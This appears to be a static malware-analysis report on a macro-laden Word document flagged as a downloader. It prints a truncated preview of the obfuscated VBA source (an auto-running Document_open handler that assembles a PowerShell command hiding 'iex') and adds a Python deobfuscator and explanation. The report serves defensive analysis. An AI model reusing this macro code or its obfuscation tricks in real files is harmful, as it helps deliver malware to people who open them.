Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6d981cb83f84894a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 394.5 KB
Created: 2018-07-13 20:09:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: eeafa7799cdd0c188ed39b7077712a07
SHA-1: bcaf9fb9fc2396b4d76fac05e03507fc7835b1b8
SHA-256: 6d981cb83f84894ad7c5bd58e2b410c19e35623dffa50497e8e6016afb3ebf23
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Word document (OLE container) carrying VBA macros. Its Document_open handler runs automatically when the document is opened; under On Error Resume Next it pads the code with dead arithmetic and then hands a command string, assembled from dozens of short literal fragments interleaved with never-assigned variable names, to Application.Run. The fragments visible in the preview spell a mixed-case PowerShell invocation ("pOw" + "ERs" + "hEl" + "l"), and the analyzer additionally found a Shell() call in the macro code, so the document is built to launch a secondary stage, consistent with a downloader. The ClamAV detection Doc.Malware.Valyria-6874676-0 corroborates the verdict.

Heuristics (6)

  • [critical] ClamAV: Doc.Malware.Valyria-6874676-0 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6874676-0
  • [medium] VBA macros detected (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • [critical] Shell() call in VBA (OLE_VBA_SHELL)
    The macro code calls Shell(), which starts an external program from the document's context
  • [high] Document_Open macro (OLE_VBA_DOCOPEN)
    A Document_Open handler is present; it executes automatically when the document is opened (subject to the macro security setting)
  • [high] VBA p-code auto-exec with execution tokens (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code/cache) stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable, for example VBA-stomped files whose source stream has been overwritten while the p-code still runs.
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace URI that Office writes into embedded drawing parts; it is not a payload or C2 location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  48839 bytes
SHA-256: df8dd97407b1aa12fffc1cca66d32544b79f2103c313f61d54648c874a86f792

Script preview: first 1,000 lines of the extracted script (truncated below)
Attribute VB_Name = "uqEwBMSRDvsXwm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   vmPJl = (95024 - 3285 / 54662 * jjupM + (9513 + Niwov + 14828 / SEZcV * 38979 / TjSpM))
   mTjOBp = (57689 - 61775 / 7946 * IYPfik + (7143 + ROWbX + 14674 / drsVGL * 17589 / TChodq))
   vNzbA = (540 - 2091 / 24244 * aJaij + (59224 + fwpBYs + 84040 / NiYdEE * 93246 / iIcTf))
   wUhwfj = (75402 - 6240 / 47118 * wNjGL + (91547 + OXzlKz + 70189 / pwcwva * 60593 / iXGqL))
kKrGsrGiiO = Application.Run("ZNHZmYwIdwBR", "" + ImOQYjiY + UwTczEKnawELU + QspEcS + kNfuEN + hjETzf + EmKphipPmJc + MhkCWbNQ + iXsYOdqiG + cANdQ + JjijXrC + osNYcDUs + jjmlGVUXVdU + OACrcM + bSppSpUdc + zNKOsOpzE + RzOmAM + SXnzpmH + pzhNvzM + MOSuwoXzzpjK)
   vTrACb = (13806 - 49732 / 88508 * zZvumF + (17004 + zVMDQ + 25471 / Nshcv * 91340 / zdmsV))
   wSnEjF = (10672 - 32454 / 89907 * twMQXD + (81214 + lKiLNf + 60927 / jsNiNt * 67173 / juIud))
End Sub


Attribute VB_Name = "IcTTiNTnZwp"
Function QspEcS()
On Error Resume Next
wriAa = 10245 * jmGzjf - 73397 + BTzPuW + 72313 - GzBRnS * 75382 + PzOrvl + 80257 * hNQGi
   laCzfv = 11686 * CKwcAY - 77482 + QzYjjQ + 89495 - PdsihG * 58860 + MUQqk + 37709 * nJHLj
   RZdkj = 75146 / WHcYb - baiOsj + CXkkV + (aXWJh * nWiiz - SdZTl + lmnonU / (hntztp / OQMmAw / 90302 / 41965))
SZwDGkOtvk = "" + jtUzHJKvUjOkB + KwjmQfHzIw + "pOw" + acFNrFnJoMGW + ZwKWjGk + "ERs" + OAKtKbvMDQYkTP + iNujwqJlOF + "hEl" + mNkBofqNjMdht + FdRGhrz + "l " + pBwYrZfEPHapf + nYFqRjMqznDHwz + "  " + mHsLmhRVHhZRlZ + FWSImJnIdLA + Chr(34) + " . " + RiElLnhnMIFHj + KuEXZdCajWKd + "((g" + hbjjipwUjamf + NNBCZCwjGcLKPI + "v " + BJNDihZaB + pNilurINTVHD + "'*Md" + wUEUXZpzRZcR + foaAjPIVc + "R*'"
TTXMT = 32055 / XioKO + Yzmis / 80667 / 7629 * IDZBC * 99422 * 48318 / (nFsKQ * bkKjL)
   THvEu = 86915 / vSjNU + dTwsw / 10002 / 17738 * IthfuH * 44817 * 4530 / (crMDES * sXjWWQ)
wrISXqjrvH = "" + OtEhTXtndai + QzLRQAwu + ")." + DwMYCYJiA + ofwUfBfAbRf + "NAME" + KmzSuCW + bAkHzrOUwdu + "[3" + SOwlwSuGAXc + PZrjzitID + ",1" + YBnlHVBaUiTk + DDpZacIw + "1,2" + pcMfPoTPSMM + JziWBqfwoVZ + "]-" + EjdTbbPLviI + fOESJzGX + "jOI"
VviSUY = 24858 / DSFZG + vqmiu / 21474 / 97283 * LaElPO * 46329 * 78116 / (wAPVP * ZCnPNz)
   vGGGG = 60222 / Hnlok + lwkkhU / 26034 / 38976 * ArKQs * 42557 * 23869 / (nCYJhN * VJfuX)
MiNmfPwwD = "" + GFaTtQdK + jDOiIwBOzJZq + "N'')" + DMcGvkmGXvi + EvCTpilfiLTfQ + " ("
NKzAv = 70697 / CrBrXz + XkpJNb / 21494 / 82555 * itcWi * 968 * 20412 / (Lmfrj * QLTvrQ)
   nBCsOh = 12232 / RJEzD + tuidu / 68091 / 54534 * dDFqzQ * 13248 * 7333 / (tIiWzS * vuYIk)
   GuiQKu = 29533 / nWOAzd + SEzKwT / 94384 / 80872 * MJBUBJ * 53182 * 59911 / (BAcNO * tpPPw)
rbOJXvh = "" + TUXKjzWPNWp + TODBhhf + " \" + Chr(34) + wrmYzufUan + JBKqbUoWR + " $(" + dKsEspjAzqwYf + CcktwBUn + "SeT" + sLFMqOCbA + EpmirnBcK + "-itE"
SQSMmY = (46203 * IWirAi + 56544 * IbwzfO + 93210 + mzOFOT) * zkNsp + ibdDKA * 83987 - 42132
   ANztAN = (59379 * EUUaoK + 35601 * oLjGml + 76898 + dzTuVN) * bnKOr + aKmGO * 77869 - 41063
MTzXwjuXRs = "" + TkjLjmsAOZGP + kdqPtmivaMOAwA + "M  '" + STZMzJmBYovKAS + JrVlwGjS + "VAri" + KXzjqrcQHn + ubrorErTuIDDq + "ab" + nzMmGDbwPEr + ijLUUVz + "le:o" + JOcbpdBTuplMoR + jkScckz + "Fs' " + kLziiUHltpzKf + zvKBNqtRQTllfQ + " '" + PWnFREkLVd + cwqDVTfjZzszqt + "')\" + Chr(34) + zjcUbQhos + sKwjjPwpTdhP + Chr(43) + "[sT" + kzSdqPYYWOmB + MOCLNmnWbR + "ri" + sDMlPTRjqQPK + IUokuiIddEaWCY + "nG][" + YAUIWULkz + XdvwrITdSiqW + "Cha"
CwcVu = (59551 * uwGFi + 89841 * wbXWn + 30682 + fwfur) * tjDdOU + CiBDLV * 86310 - 66348
   OaHLs = (31912 * lcrPpt + 43769 * IElbzl + 82 + FiOjvi) * idujIu + YGCrl * 2905 - 8365
   PwpKd = (10646 * cnOsBc + 58313 * zGvJlv + 19578 + uEfiY) * AwdWj + mFUCci * 33950 - 92196
fjIFOYou = "" + ELPDBLuIdmWzwa + MNvdqNBCPZTLS + "R[" + IWmqjWpfsiFq + iEdIcjUbwCq + "]]( 
... (truncated)
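The obfuscation in the preview is simple once named. Every string-building line has the form `name = "" + junk + junk + "literal" + ...`, where the junk identifiers are never assigned; without Option Explicit an unassigned VBA variable is an Empty Variant, which concatenates as the empty string, so only the literals and the Chr() calls survive. The arithmetic lines are dead weight: they divide by unassigned (Empty, i.e. zero) variables, and On Error Resume Next swallows the resulting errors. The Python below is an added example written for this page, not tooling from the analyzer or from the sample's author. It reassembles the fragments from the QspEcS assignment lines copied verbatim from the preview above; that the function returns those pieces concatenated in source order is an assumption, since its return statement lies past the preview cut-off, and that the junk identifiers are unassigned everywhere is likewise assumed from the visible portion. The last helper applies standard PowerShell knowledge about the `(gv '*MdR*').NAME[3,11,2]-join''` idiom that the decoded fragment contains.

```python
import re

# A VBA concatenation expression is broken into string literals, Chr(n)/Chr$(n)
# calls, and bare identifiers. Identifiers are assumed unassigned (Empty), so
# they contribute nothing to the result.
_TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'                 # "literal" ("" inside is an escaped quote)
    r'|Chr\$?\s*\(\s*(\d+)\s*\)'        # Chr(34) -> '"', Chr(43) -> '+'
    r'|[A-Za-z_][A-Za-z0-9_]*',         # junk identifier -> ""
    re.IGNORECASE)
_ASSIGN = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$')


def eval_concat(expr: str) -> str:
    """Reduce a '+'/'&' concatenation expression to its literal string value."""
    out = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            out.append(m.group(1).replace('""', '"'))
        elif m.group(2) is not None:
            out.append(chr(int(m.group(2))))
        # else: bare identifier, Empty Variant -> nothing appended
    return "".join(out)


def reassemble(vba_lines) -> dict:
    """Map each string-building assignment to its decoded value, in source order.
    Pure-arithmetic assignments (no literal, no Chr) are dead code and skipped."""
    decoded = {}
    for line in vba_lines:
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        if '"' in rhs or re.search(r'Chr\$?\s*\(', rhs, re.I):
            decoded[name] = eval_concat(rhs)
    return decoded


# The QspEcS string-assignment lines, copied verbatim from the preview on this page.
QSPECS_LINES = r'''
SZwDGkOtvk = "" + jtUzHJKvUjOkB + KwjmQfHzIw + "pOw" + acFNrFnJoMGW + ZwKWjGk + "ERs" + OAKtKbvMDQYkTP + iNujwqJlOF + "hEl" + mNkBofqNjMdht + FdRGhrz + "l " + pBwYrZfEPHapf + nYFqRjMqznDHwz + "  " + mHsLmhRVHhZRlZ + FWSImJnIdLA + Chr(34) + " . " + RiElLnhnMIFHj + KuEXZdCajWKd + "((g" + hbjjipwUjamf + NNBCZCwjGcLKPI + "v " + BJNDihZaB + pNilurINTVHD + "'*Md" + wUEUXZpzRZcR + foaAjPIVc + "R*'"
wrISXqjrvH = "" + OtEhTXtndai + QzLRQAwu + ")." + DwMYCYJiA + ofwUfBfAbRf + "NAME" + KmzSuCW + bAkHzrOUwdu + "[3" + SOwlwSuGAXc + PZrjzitID + ",1" + YBnlHVBaUiTk + DDpZacIw + "1,2" + pcMfPoTPSMM + JziWBqfwoVZ + "]-" + EjdTbbPLviI + fOESJzGX + "jOI"
MiNmfPwwD = "" + GFaTtQdK + jDOiIwBOzJZq + "N'')" + DMcGvkmGXvi + EvCTpilfiLTfQ + " ("
rbOJXvh = "" + TUXKjzWPNWp + TODBhhf + " \" + Chr(34) + wrmYzufUan + JBKqbUoWR + " $(" + dKsEspjAzqwYf + CcktwBUn + "SeT" + sLFMqOCbA + EpmirnBcK + "-itE"
MTzXwjuXRs = "" + TkjLjmsAOZGP + kdqPtmivaMOAwA + "M  '" + STZMzJmBYovKAS + JrVlwGjS + "VAri" + KXzjqrcQHn + ubrorErTuIDDq + "ab" + nzMmGDbwPEr + ijLUUVz + "le:o" + JOcbpdBTuplMoR + jkScckz + "Fs' " + kLziiUHltpzKf + zvKBNqtRQTllfQ + " '" + PWnFREkLVd + cwqDVTfjZzszqt + "')\" + Chr(34) + zjcUbQhos + sKwjjPwpTdhP + Chr(43) + "[sT" + kzSdqPYYWOmB + MOCLNmnWbR + "ri" + sDMlPTRjqQPK + IUokuiIddEaWCY + "nG][" + YAUIWULkz + XdvwrITdSiqW + "Cha"
'''.strip().splitlines()


def qspecs_fragment() -> str:
    """Join the decoded pieces in source order (assumed to be the return order)."""
    return "".join(reassemble(QSPECS_LINES).values())


def resolve_index_trick(variable_name: str, indices) -> str:
    """PowerShell-side half of the decoded fragment: (gv '*MdR*').NAME[3,11,2]-join ''
    picks characters out of a variable's *name*. In a default Windows PowerShell
    session the only variable matching *MdR* is MaximumDriveCount, and indices
    3,11,2 spell 'iex' (Invoke-Expression) without the string ever appearing."""
    return "".join(variable_name[i] for i in indices)


if __name__ == "__main__":
    print(qspecs_fragment())
    print(resolve_index_trick("MaximumDriveCount", [3, 11, 2]))
```

The decoded fragment reads `pOwERshEll   " . ((gv '*MdR*').NAME[3,11,2]-jOIN'') ( \" $(SeT-itEM  'VAriable:oFs'  '')\"+[sTrinG][Cha` and stops where the preview does. Two idioms are already visible: the Get-Variable name-indexing trick that yields `iex` without writing it, and `Set-Item Variable:OFS ''`, which clears the output field separator so a following `[string][char[]](...)` cast joins a byte array into the next stage without spaces. Because only QspEcS's body is in the preview and Document_open concatenates nineteen other function results around it, this is one slice of the final command, not the whole of it.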